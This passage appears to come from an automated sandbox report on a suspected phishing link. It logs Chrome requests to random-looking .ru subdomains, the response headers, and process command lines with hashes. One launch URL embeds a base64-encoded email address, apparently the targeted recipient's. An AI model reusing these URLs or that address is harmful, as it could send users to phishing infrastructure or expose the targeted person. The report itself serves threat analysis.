                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jkted9AZoLinUpQIk4gGMAs7347NxDpK139yiH6kOqoW6Hwkp%2F8k6Kvztbw8f%2BVE4ogh5mMJtzFUOw2vkGkPpuR9EVTwu7QV0WY%2ByvihTTIyHmGBIPgTTMD0PHqalbvqioN5lSHHvaqKAorY%2Bgin3RUG0APzaHFTzUmptWG9QCQnUWz%2FA33DqRItGiEBM5vIT0LFwCYz8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902b4c42bfe281a9-IAD
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7338&min_rtt=7294&rtt_var=2767&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1258&delivery_rate=400329&cwnd=32&unsent_bytes=0&cid=f1bac8409ddc617a&ts=610&x=0"
                                                          2025-01-16 04:17:48 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                          Data Ascii: 11
                                                          2025-01-16 04:17:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.449778104.21.42.2084432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:49 UTC476OUTGET /478252250458126598869NAvKmLJHHIDCBIGVWTZZDXTZQNQJWSQOLATPKBEJADGSYPAIIHZIFXUZZGMEARM HTTP/1.1
                                                          Host: dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:49 UTC899INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hlgSjxzvhRKN6Ydqh9WKEypsUjRa2nbbgHXJc4kpmiPvAc9Ggf83YcSC74T3H172IhMnhbpKKMZ%2FwZuE7FxUI3WMr2mWDa%2ByPEuCEPCUaU0qOeDNg1H8ezCzUI9z7j%2F%2FedMxnZ2jX19SJ34MFsBneerFT2QQcCGqj8h57Z9PfAS4KeFtYocX%2BYjwRhb49rZT%2F5vn1LGZqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902b4c4a4cbdc9bd-IAD
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8310&min_rtt=8271&rtt_var=3179&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1054&delivery_rate=340207&cwnd=32&unsent_bytes=0&cid=2d6f722a8ccdb2e6&ts=595&x=0"
                                                          2025-01-16 04:17:49 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                          Data Ascii: 11
                                                          2025-01-16 04:17:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:23:17:18
                                                          Start date:15/01/2025
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:2
                                                          Start time:23:17:22
                                                          Start date:15/01/2025
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,18349187125816004282,11798271586635004121,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:23:17:29
                                                          Start date:15/01/2025
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ=="
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          No disassembly